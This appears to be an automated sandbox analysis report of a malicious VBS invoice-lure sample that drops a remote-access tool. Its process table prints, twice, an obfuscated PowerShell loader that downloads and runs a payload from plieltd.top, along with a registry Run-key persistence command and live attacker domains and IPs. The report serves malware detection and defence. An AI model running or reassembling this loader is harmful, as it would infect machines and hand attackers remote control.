Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\remcos\logs.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55lrmmve.za3.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ipby20gf.uzl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whax01k5.z3n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ykmc5ace.1ez.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Clothesman.Vin
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs"
|
|
|
|
C:\Windows\System32\PING.EXE
|
ping gormezl_6777.6777.6777.677e
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty
#>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI;
function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging;
for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function
Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta
Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten
fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio.
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku
m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness
'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile
B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness
'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE
psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese
oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart
S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told
');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce
MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU
ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS
Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent
kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k
autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor
(pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade
rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso
anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV
dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci
(,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo
Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril
Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K
iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l
TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel
eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor
(pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE
ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor
(pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO
StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf
% Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor
(pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik-
SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor
(pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro
tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS
RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a
Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub
cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj
arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM
T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M
mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro
BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Servicetilbuds Fangerne Sidsernes Cormidium Brnesangen Pouty
#>;$Tredjeverdenslandets='Bilberries43';<#Efterordenes fjedervgt Soubrettens leftism Radiography #>;$Saltvandsfisk=$selvvirkendes+$host.UI;
function pepperiness($Klassesttet){If ($Saltvandsfisk) {$Envisaging++;}$possesses=$Unlimned+$Klassesttet.'Length'-$Envisaging;
for( $Multiciliated=4;$Multiciliated -lt $possesses;$Multiciliated+=5){$Aithochroi56=$Multiciliated;$Politiskoler+=$Klassesttet[$Multiciliated];$Opbyggeligste='Weltanschauung';}$Politiskoler;}function
Isopor($jomfrunalske){ & ($Hovedkarakterer) ($jomfrunalske);}$Folkeskoleomraadet=pepperiness 'IsolMAnlgoEffez noriEssolGanglin,ta
Lig/ Bl, ';$Folkeskoleomraadet+=pepperiness 'Refr5ra e.Spot0omda Mulc(IndtW DisiBespn Dd dModao A,cwKultsFedt igN avT Ten
fi.1slay0Thom.Unde0Stav;Ahop Lo iW teriKravnKurs6Sis.4Engr;Tank HjrxOpti6Rhyp4Incr; ete TrasrGeo v ,es: yr1Dile3 Tai1 Bio.
alg0 Pos)Perp ForsG OuteMaancZan.kCathoBart/ Che2Vold0Pauc1Sluk0 Chi0 S a1 ea0w.re1Prog GynoFBelviLokar ndeeLegefHe soNonrxNett/halv1,eta3Ku
m1Data.Upbu0 Gui ';$Efterords=pepperiness 'DiktuPhotsOverE orlrK.od-Job aForbg KofeSy,bnRisitProg ';$Ordreafgivelser=pepperiness
'UnmehTeletGrost enpImplsUdtr:Sols/Mora/Kanopov rlP rsi AlleSenslForstBlyadB,nz.Hy.etbil,oR afpBakk/BeasT isclUdtnlChile
B esIdio1Barb8glut7Time.F,agdMadke S lpDokul In oSendySubc ';$haole=pepperiness 'tetr>Wels ';$Hovedkarakterer=pepperiness
'CockIdumhe SinXAnse ';$Kontrahering='Tekstlig';$Jackhammer='\Clothesman.Vin';Isopor (pepperiness 'Thig$ BraGStemlCordoMarvBPostaEthiLCibo:OverE
psVTe.meJagtLSatiE,easeDe enArmhs Asp=Unit$Brute OttnS utVexpr:T,veaEncrp HaaP ondalfaAPe sT HofAsymp+Bobs$ Kvsj En AMatacMisakNoteH,orlaTomeMPeptMPrese
oldRBus ');Isopor (pepperiness 'Hard$Und gSociLTveto WoobPar anotal ead:SkamfHestoUdsiRDraiMDissA A tlpo,yIDis SKrameart
S Sen=Chil$disiOWorrr eaDDemoR MaeEFigeaF gef Drag limIRe.rvForaECuralEd csReolEKobbr Cla.StatS,lebp LisL LanIBoggtS ag(H,po$SemihMa,iASnito.onpLOctreacet)Told
');Isopor (pepperiness ' Und[SwifnstabETsumT.agt.ForuSGeneERadircemev StriTilnC .ekEOctopRed.oKleiI Sa NGav.T bscM,kraAUnclNBnnea,nnigPh,ce
MolR nrt] B,l:Succ:MusksProgev.rdcSt.aUFl.tRd ndI FlytJaywYjvnfpParaRWineOInfithummoDolocRom oSignLMidt Cecr=Foru Excr[Kaian.emie.lgttU
ru. RhasH,rpeve,ecEndiuAsteRPro iLallT egeYTuvaPT anroutgoFarmT TabODyrlcStauOBobbL StuTVoicy ussPU saeAtio]Oec,:grat: esstMidnlchteS
Non1Ca.o2Ddsr ');$Ordreafgivelser=$Formalises[0];$Gammel=(pepperiness 'S it$predgEstalLe iOUninbK alaEnteL Sax:M drL nivIIntent
kuIParmESvrtn CyluBo.dm ComMCr dePlicrSynteSkylr disiB,rrnP rsGJeopeKravrskld= PosN taoERepewDugp- Geno AdebMilij ti EGalvcImprtPi.k
autoS marYFor.S,aratStudeUnflMT,ta.SkatNPepeE IgntHjem.DephwUdtrEHrigBDevaCOrdsl ForISalte ilinSy,cthust ');Isopor ($Gammel);Isopor
(pepperiness 'Kvid$intelIndbi NebnMilii Tote HypnSnuruReprmVitamM.tteU.virEnhee ClirSnd iNovenDeflg.orkeAerorMorb.TawpHRunoeLullade
rdDerfeDagsrBe,tsStre[Forb$modiE AfrfWheetNonce co.rTermo.ragrB.lodKlags Int]O tl=Ek,k$VersFA shoGldelFor kA seeU,nvslopskForso
anl,edteDrogoRumfmGlosrSesaaGrnlaAnatdSrileS,uttLawy ');$cosmozoism=pepperiness 'Afve$TelelBryliLys,n nniiOv reFu dnVirkuV
dem Emam V neRctsrSaeseEtior riliUn.rnSt,agSubaeAf irOutb. rbeD BlooVan w ndnDipllVaaroWoora nond HetFnon iFormlLandeAci
(,ill$ aerO repr Ob d PrerAn.heNavnaPresf otagFulwi agtvAmmoeTid lSoupsB uge subrShi.,Elsk$ StrS penp ,egoS gdnImp.g eryiUndeo
Rusp imol unoaReissTeksm SmuiTo dcRust) Tek ';$Spongioplasmic=$Eveleens;Isopor (pepperiness 'Udem$BortG Po lGobyoInvab nikaPeril
Maz:DiskI ForNAcraDabsttB ndSUforE BloDPr aeBrak=mi c(Udt TNedjeStedsBe atOkke-SnubpLaerASoriT.ineH ska R,ti$ B,iS.nesp K
iOse,in yomg novIS ygOKontP S dlCenta VilsBatcM knii HekC Svi) Unm ');while (!$Indtsede) {Isopor (pepperiness ' M s$FaragOve.l
TreoRetibR koaClogl usl:F,stSTurbkSmalu ecke GresDo ip ,tvi .onlattelMin,eSad.rVltee.edrv LoenDerme E e= Bio$ kvtExt rRealuCel
eEqua ') ;Isopor $cosmozoism;Isopor (pepperiness 'FishsFoelTKonfa Po r Rh TUdve-G,mnsUnpulPosseObjeEhellpOpsa Tetr4 Cor ');Isopor
(pepperiness 'Ny.e$ ocGSvmmL HecoDistB,ortA FraLPrez:SensiTuskNDov dMakst EkssspineUninDTrosETakt= Bor( Urit Afse pensDeprtE
ep- WasP ieaForeT rocH Haa Per$Re.isSocipSkilO DomNPul,gConvIParaOud epHyl,L O,eAClanSE olM apiNavnc esk)Raad ') ;Isopor
(pepperiness 'Uddy$ PreGRedelH reO imibKredANo dlR.gi:,vinpSilkAWadsNtrondSlavEFunkHFodbuwoadLa,dsEKlasrDovn=A au$U feGClamlOm,oO
StubS.xoAT rsLAlfa: rbesHealtForbOUnpor Undkpr,nu ShonPeplDS,aieCymbRVareaG.ldbB anAIch TTrniTAzonerun.N enfsw ir+Konv+Udf
% Afg$ HvifArchoTeleROve mBap aRi ll Li I TvaS ickELnnuSConc.BehacVis,oUnsauHngen In t.igm ') ;$Ordreafgivelser=$Formalises[$pandehuler];}$Bortvend=334373;$Blodbanken=30661;Isopor
(pepperiness ' For$DandGEnkeLMunkO T.nbT rsA ejnlInat: ptrC tidHUmb aGallR drbLTyndaBr.odToccyIndi Cl =Elem RodGOut eLageTVrik-
SolcNickOTacknDrnlt SameBo,kN UletG.nf .gil$ SamsSandpTassoCottnPrdegRatiICreaOWandpwom LRea.a AskSBenaM TomiUdh CFree ');Isopor
(pepperiness 'H lh$KradgNudelSk.io ProbKol,a ndelT,bs:HverJ,rtioNapabRicob Pr,eBolir enneStannTuers Fen Rib=Gnav Sleu[ParaSVeneyGratsCro
tBullebresm Sub.FortCSi noHungn V,tvSkoveDiser Fortarau]Noni:Repu:OverFMn drStymo DemmPea BKollaLumbs Th,eUnre6 ,xp4Pr,vS
RegtV,abrMiliiSyrlnAldrgerho(k rn$ psc nohtypeaPinsr osclGranaSistdGranyTerr)Brac ');Isopor (pepperiness 'Fore$GormgStemLSpolOStalBDid.a
Eftlh ng:morttPr.guCoroCOverKGoweT RehoMohiO Tog Non = Raa Vagt[ Hovs CitYFostsTaabt jorEQui m om. ntiTGle,e UnoxCurlTOrga.,utrEZerenSub
cChemOInfoDAdviiNedsN AdiGThou]Shun:Pers:tennaHimnSB.glCich.IKontiSosi. amegRoyae AprtSmmeSSandtUn,rRe vii Pr NFa sgRokk(Tank$Portj
arnOLienBCle,BSpanEBigurParaE merN PonSSpo.)Odyl ');Isopor (pepperiness 'Unbu$UdtaG orhl ylOMar be spa CollMega:Molis TurEDortM
T tIHoraCcsiuOItern GalV I aEL miNForeTPre,I aenOO ern NstAU ldl ssuI inktTs rYKnib=Skru$FiskTTronuFri.cstorK N nTUncooSadeoChan.M
mbs PaaUHaanbDia,SAbantFamirquadi leunKampgSemi(Shin$ Un BSupeo BegR.lurtTi.vvAq aeSkrln SladEmne,Unde$ BorbForelAl.eO AdrdPro
BTopmAScruNGurgkbrkneBlu N Lla) Una ');Isopor $Semiconventionality;"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\SysWOW64\msiexec.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t
REG_EXPAND_SZ /d "%Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase%
($Jordbundssammenstnings)"
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Sandsynliggrelsens" /t REG_EXPAND_SZ /d "%Hexokinase% -windowstyle
1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)"
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://plieltd.top
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
https://plieltd.top/Tlles187.deployXR#l
|
unknown
|
||
|
https://plieltd.top
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://plieltd.top/Tlles187.deploy
|
172.67.155.139
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/pscore6lBkq
|
unknown
|
||
|
https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin
|
172.67.155.139
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://plieltd.top/Tlles187.deployP
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://plieltd.top/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://plieltd.top/ZPepSmQfDUPElVSkiams84.bin8p
|
unknown
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pelele.duckdns.org
|
185.236.203.101
|
|
|
|
gormezl_6777.6777.6777.677e
|
unknown
|
|
|
|
plieltd.top
|
172.67.155.139
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.236.203.101
|
pelele.duckdns.org
|
Romania
|
|
|
|
172.67.155.139
|
plieltd.top
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Skulptureredes
|
carlcorey
|
||
|
HKEY_CURRENT_USER\Environment
|
Hexokinase
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Rmc-TXCR8B
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Sandsynliggrelsens
|
There are 10 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7D00000
|
heap
|
page read and write
|
|
|
|
927D000
|
direct allocation
|
page execute and read and write
|
|
|
|
89E0000
|
direct allocation
|
page execute and read and write
|
|
|
|
5F76000
|
trusted library allocation
|
page read and write
|
|
|
|
2377E000
|
stack
|
page read and write
|
|
|
|
1CBABCF5000
|
trusted library allocation
|
page read and write
|
|
|
|
7CD0000
|
heap
|
page read and write
|
|
|
|
221C30DD000
|
heap
|
page read and write
|
||
|
2383C000
|
stack
|
page read and write
|
||
|
849E000
|
stack
|
page read and write
|
||
|
9180000
|
direct allocation
|
page execute and read and write
|
||
|
221C1020000
|
heap
|
page read and write
|
||
|
4C1E000
|
stack
|
page read and write
|
||
|
23528B30000
|
heap
|
page read and write
|
||
|
7E40000
|
heap
|
page read and write
|
||
|
1CB9A1D0000
|
trusted library allocation
|
page read and write
|
||
|
3010000
|
trusted library section
|
page read and write
|
||
|
1CB99EC0000
|
heap
|
page read and write
|
||
|
221C30E6000
|
heap
|
page read and write
|
||
|
221C3094000
|
heap
|
page read and write
|
||
|
221C2F17000
|
heap
|
page read and write
|
||
|
7BA0000
|
direct allocation
|
page read and write
|
||
|
2DB0000
|
heap
|
page readonly
|
||
|
221C30D3000
|
heap
|
page read and write
|
||
|
221C306E000
|
heap
|
page read and write
|
||
|
221C1192000
|
heap
|
page read and write
|
||
|
221C30CC000
|
heap
|
page read and write
|
||
|
7D00000
|
heap
|
page read and write
|
||
|
7FFD9A330000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A210000
|
trusted library allocation
|
page read and write
|
||
|
221C309D000
|
heap
|
page read and write
|
||
|
87DA000
|
heap
|
page read and write
|
||
|
2B08000
|
heap
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
1CBB4279000
|
heap
|
page read and write
|
||
|
7DB0000
|
direct allocation
|
page read and write
|
||
|
1CB9A190000
|
heap
|
page readonly
|
||
|
2B87000
|
stack
|
page read and write
|
||
|
7950000
|
trusted library allocation
|
page read and write
|
||
|
23900000
|
heap
|
page read and write
|
||
|
7D90000
|
direct allocation
|
page read and write
|
||
|
7DF449F90000
|
trusted library allocation
|
page execute and read and write
|
||
|
717A000
|
stack
|
page read and write
|
||
|
7CF70FF000
|
stack
|
page read and write
|
||
|
7E46000
|
heap
|
page read and write
|
||
|
221C2F14000
|
heap
|
page read and write
|
||
|
874E000
|
stack
|
page read and write
|
||
|
221C30E6000
|
heap
|
page read and write
|
||
|
8A20000
|
direct allocation
|
page read and write
|
||
|
221C12A0000
|
heap
|
page read and write
|
||
|
221C2F39000
|
heap
|
page read and write
|
||
|
49CE000
|
stack
|
page read and write
|
||
|
95D000
|
stack
|
page read and write
|
||
|
221C11F2000
|
heap
|
page read and write
|
||
|
1CBB4500000
|
heap
|
page read and write
|
||
|
221C30A4000
|
heap
|
page read and write
|
||
|
8A70000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB9C81E000
|
trusted library allocation
|
page read and write
|
||
|
221C2F5D000
|
heap
|
page read and write
|
||
|
1CB9C119000
|
trusted library allocation
|
page read and write
|
||
|
4D5D000
|
remote allocation
|
page execute and read and write
|
||
|
7D80000
|
direct allocation
|
page read and write
|
||
|
7FFD9A201000
|
trusted library allocation
|
page read and write
|
||
|
1CB9C108000
|
trusted library allocation
|
page read and write
|
||
|
221C3078000
|
heap
|
page read and write
|
||
|
221C30DD000
|
heap
|
page read and write
|
||
|
2E2B000
|
heap
|
page read and write
|
||
|
7800000
|
trusted library allocation
|
page read and write
|
||
|
1CBB3FC0000
|
heap
|
page read and write
|
||
|
7B90000
|
direct allocation
|
page read and write
|
||
|
221C2F12000
|
heap
|
page read and write
|
||
|
2E3E000
|
stack
|
page read and write
|
||
|
A00000
|
heap
|
page read and write
|
||
|
2AFF000
|
stack
|
page read and write
|
||
|
7FFD9A060000
|
trusted library allocation
|
page read and write
|
||
|
5D41000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A3D0000
|
trusted library allocation
|
page read and write
|
||
|
1CB9A055000
|
heap
|
page read and write
|
||
|
7E00000
|
direct allocation
|
page read and write
|
||
|
8370000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A350000
|
trusted library allocation
|
page read and write
|
||
|
221C32C0000
|
heap
|
page read and write
|
||
|
7FFD9A240000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB9DA12000
|
trusted library allocation
|
page read and write
|
||
|
221C2F41000
|
heap
|
page read and write
|
||
|
7898000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9A210000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB99FA0000
|
heap
|
page read and write
|
||
|
221C30D9000
|
heap
|
page read and write
|
||
|
23230000
|
heap
|
page read and write
|
||
|
4D41000
|
trusted library allocation
|
page read and write
|
||
|
315B000
|
heap
|
page read and write
|
||
|
7CF6AFE000
|
stack
|
page read and write
|
||
|
1CBB4074000
|
heap
|
page read and write
|
||
|
22D00000
|
direct allocation
|
page read and write
|
||
|
5DAE000
|
trusted library allocation
|
page read and write
|
||
|
1CB9C808000
|
trusted library allocation
|
page read and write
|
||
|
7C93000
|
heap
|
page read and write
|
||
|
221C2F11000
|
heap
|
page read and write
|
||
|
7FFD9A2E0000
|
trusted library allocation
|
page read and write
|
||
|
2C0E000
|
unkown
|
page read and write
|
||
|
221C2F11000
|
heap
|
page read and write
|
||
|
7FFD9A106000
|
trusted library allocation
|
page read and write
|
||
|
8A10000
|
direct allocation
|
page read and write
|
||
|
7FFD9A05D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9A052000
|
trusted library allocation
|
page read and write
|
||
|
221C1159000
|
heap
|
page read and write
|
